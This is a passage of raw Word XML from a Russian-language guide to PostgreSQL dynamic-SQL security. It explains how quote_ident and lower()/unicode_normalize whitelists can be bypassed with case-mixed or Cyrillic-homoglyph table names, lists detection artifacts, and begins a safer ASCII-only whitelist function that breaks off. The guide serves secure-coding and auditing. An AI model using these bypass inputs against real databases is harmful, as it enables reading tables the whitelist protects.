        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF lower(tbl_name) &lt;&gt; ALL(allowed) THEN ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01788DBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower('uѕers')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'uѕers'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Cyrillic 's' остаётся). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'uѕers' &lt;&gt; ALL(['users', 'articles'])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — TRUE → блокировка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1D292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но если разработчик добавил Unicode-normalize </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только в whitelist</w:t>
      </w:r>
      <w:r>
        <w:t>, не в input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A57CEC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>allowed text[] := ARRAY[unicode_normalize('users', 'NFKC')];  -- 'users' (latin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4A648" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF lower(tbl_name) &lt;&gt; ALL(allowed) THEN  -- 'uѕers' (Cyrillic) ≠ 'users' → block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C1596" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Это всё ещё работает корректно, потому что Cyrillic 's' ≠ Latin 's'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124F807" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Реальный hole — когда whitelist неполный (разработчик пропустил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"uѕers"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не знает о её существовании</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пропускает её. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>less attack, more «existing typo bug»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — но в context-е identifier injection важно понимать, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>quote_ident не валидирует identifier semantically</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424C0AE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — `quote_ident` для значения (mis-use):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AD1AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- АНТИПАТТЕРН: quote_ident для строкового значения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235AB590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM users WHERE name = ' || quote_ident(user_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F41560" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('admin')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без quotes); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('admin name')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"admin name"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с double-quotes). В SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name = "admin name"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сравнение колонки `name` с колонкой `admin name`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не со строковым literal. ERROR: column "admin name" does not exist. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>functionally broken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не уязвимость само по себе, но pattern часто переходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t>-mis-use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E4E954" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Правильно — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal('admin name')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin name'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (single-quotes) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name = 'admin name'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (literal). Ещё лучше — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... USING $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.16.3) для значений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8131C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Чтение чужих таблиц через case-fold bypass whitelist (Variant A). Mis-use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для значений → broken queries или потенциальная identifier-collision attack (Variant C). Variant B (Unicode) — теоретическая поверхность, реальная только если в схеме есть Unicode-named tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61D99C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6179B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM "PUBLIC_USERS"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM "uѕers"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — необычные case-mixed или Unicode-quoted имена в EXECUTE-вычисленном SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7124585E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower(tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unicode_normalize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все требуют ручного аудита: ASCII-check присутствует?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5EFDCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от user-driven endpoint с case-mixed/Unicode именами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B2119" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_class` audit</w:t>
      </w:r>
      <w:r>
        <w:t>: existing таблицы с capital/Unicode именами в production-схеме — list для cross-check с whitelist каждой dynamic-SQL функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C719970" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Три независимых факта:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D186A54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`quote_ident` does conditional quoting</w:t>
      </w:r>
      <w:r>
        <w:t>. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System Information Functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): *"Returns the given string suitably quoted to be used as an identifier in an SQL statement string. Quotes are added only if necessary (i.e., if the string contains non-identifier characters or would be case-folded)."* Перевод: если входная строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уже валидный non-quoted identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (lowercase ASCII letters + digits + underscore), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает её </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без quotes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это означает, что output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не unique для input — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('users') = 'users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('Users') = '"Users"'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — разные SQL fragments из-за case-fold semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3F01C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL case-folds unquoted identifiers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT FROM Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (lowercase). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT FROM "Users"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точное имя с capital U. Это означает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> производит SQL-fragment, который указывает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разные таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если обе существуют).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F229C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL accepts Unicode в identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. При UTF-8 encoding, identifier может содержать любые letter-class Unicode chars. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не нормализует это.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF9C9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание: whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unicode_normalize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>может</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> скрыть существование таблиц с особенностью case/Unicode, и атакующий обходит whitelist payload-ом, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bytes equal whitelist entry после normalize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identifier-equivalent другой таблице</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в схеме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17A94C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASCII-only check + точный whitelist без normalize</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC68AEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.read_table_safe(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC500E"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2F281E80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3126E041" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed text[] := ARRAY['public_users', 'public_articles', 'public_comments'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B75E997" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F26BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
